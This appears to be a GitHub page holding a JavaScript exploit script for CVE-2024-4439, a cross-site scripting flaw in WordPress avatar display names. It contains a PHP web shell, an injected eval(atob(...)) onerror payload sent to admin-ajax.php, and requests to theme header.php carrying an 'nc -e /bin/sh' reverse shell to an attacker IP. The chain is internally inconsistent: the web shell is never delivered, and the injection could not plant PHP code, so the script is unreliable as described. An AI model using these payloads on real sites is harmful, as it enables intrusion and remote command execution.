-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-4439.js
84 lines (77 loc) · 3.2 KB
/
CVE-2024-4439.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// Payload: Reverse Shell
// Description: Exploit for CVE-2024-4439 - WordPress Plugin 'Rest Core' Unauthenticated
// Author: RC
// Instructions: Change URL and IP address in the reverse shell payload and run the script
// Description: The vulnerability arises due to insufficient output escaping of user display names, enabling both authenticated and unauthenticated attackers to inject h//armful web scripts.
//
//For authenticated users, particularly those with contributor-level access or higher, the exploit can lead to the injection of arbitrary web scripts into pages that will execute when a user views an affected page. Unauthenticated attackers, on the other hand, can exploit the vulnerability in pages where the comment block is present, displaying the comment author’s avatar.
// Reverse Shell Payload
const reverseShellPayload = `<?php
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
}
?>`;
// Function to send HTTP GET request
function sendRequest(url) {
fetch(url, {
method: 'GET',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
})
.then(response => {
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
return response.text();
})
.then(data => console.log('Command Output:', data))
.catch(error => console.error('Error:', error));
}
// Exploit: Inject Reverse Shell Payload
const exploitUrl = 'http://[HOST]/wp-admin/admin-ajax.php?action=rest_core_controller_create_item&collection_name=avatars';
const randomColor = '#' + Math.floor(Math.random()*16777215).toString(16); // Random color for obfuscation
const exploitData = JSON.stringify({
attributes: {
size: 96,
userId: 1,
style: {
border: {
color: `${randomColor}", "type": "text/css", "onerror": "eval(atob(this.id))//`
}
}
},
content: 'Exploited!',
blockName: 'core/avatar',
clientId: 'exploited-' + Math.random().toString(36).substring(7),
blockVersion: 1,
innerBlocks: []
});
// Send exploit to inject payload
fetch(exploitUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
},
body: exploitData
})
.then(response => {
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
return response.json();
})
.then(data => {
console.log('Exploit successful:', data);
// Test reverse shell in different themes with URL encoding for the command
const themes = ['twentytwenty', 'twentytwentyfour', 'twentytwentythree', 'twentytwentytwo', 'mintify']; // Add more themes if needed
const cmd = encodeURIComponent('nc -e /bin/sh [IP] 4444');
themes.forEach(theme => {
const reverseShellUrl = `http://[HOST]/wp-content/themes/${theme}/header.php?cmd=${cmd}`;
sendRequest(reverseShellUrl);
});
})
.catch(error => console.error('Exploit failed:', error));